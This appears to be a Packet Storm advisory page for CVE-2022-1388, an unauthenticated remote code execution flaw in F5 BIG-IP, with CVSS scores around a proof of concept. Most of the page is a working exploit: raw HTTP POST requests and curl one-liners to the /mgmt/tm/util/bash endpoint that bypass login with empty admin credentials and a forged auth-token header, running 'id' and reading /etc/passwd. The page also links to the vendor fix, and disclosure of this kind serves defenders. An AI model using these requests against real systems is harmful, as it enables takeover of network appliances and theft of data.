Lucene search

K
packetstormAlt3kx, github.comPACKETSTORM:167007
HistoryMay 09, 2022 - 12:00 a.m.

F5 BIG-IP Remote Code Execution

2022-05-0900:00:00
Alt3kx, github.com
packetstormsecurity.com
415

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

`# F5 BIG-IP RCE exploitation (CVE-2022-1388)  
  
POST (1):   
  
POST /mgmt/tm/util/bash HTTP/1.1  
Host: <redacted>:8443  
Authorization: Basic YWRtaW46  
Connection: keep-alive, X-F5-Auth-Token  
X-F5-Auth-Token: 0  
  
{"command": "run" , "utilCmdArgs": " -c 'id' " }  
  
curl commandliner:   
  
$ curl -i -s -k -X $'POST'  
-H $'Host: <redacted>:8443'   
-H $'Authorization: Basic YWRtaW46'   
-H $'Connection: keep-alive, X-F5-Auth-Token'   
-H $'X-F5-Auth-Token: 0'   
-H $'Content-Length: 52'   
--data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \'id\' \" }\x0d\x0a'  
$'https://<redacted>:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080  
  
  
POST (2):  
  
POST /mgmt/tm/util/bash HTTP/1.1  
Host: <redateced>:8443  
Authorization: Basic YWRtaW46  
Connection: keep-alive, X-F5-Auth-Token  
X-F5-Auth-Token: 0  
  
{"command": "run" , "utilCmdArgs": " -c ' cat /etc/passwd' " }  
  
curl commandliner:  
  
$ curl -i -s -k -X $'POST'  
-H $'Host: <redacted>:8443'   
-H $'Authorization: Basic YWRtaW46' -H $'Connection: keep-alive, X-F5-Auth-Token'   
-H $'X-F5-Auth-Token: 0'  
--data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \' cat /etc/passwd\' \" }\x0d\x0a\x0d\x0a'  
$'https://<redacted>/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080  
  
Note:   
  
Issue could be related between frontend and backend authentication "Jetty" with empty credentials "admin: <empty>"   
+ value of headers ,see "HTTP hop_by_hop request headers"...  
  
References and Fixes :  
* https://support.f5.com/csp/article/K23605346  
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388  
  
Here the documentation used latest nites:  
* https://clouddocs.f5.com/api/icontrol-rest/   
  
HTTP hop_by_hop request headers:   
* https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open  
  
# Author  
Alex Hernandez aka @_alt3kx_  
`

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P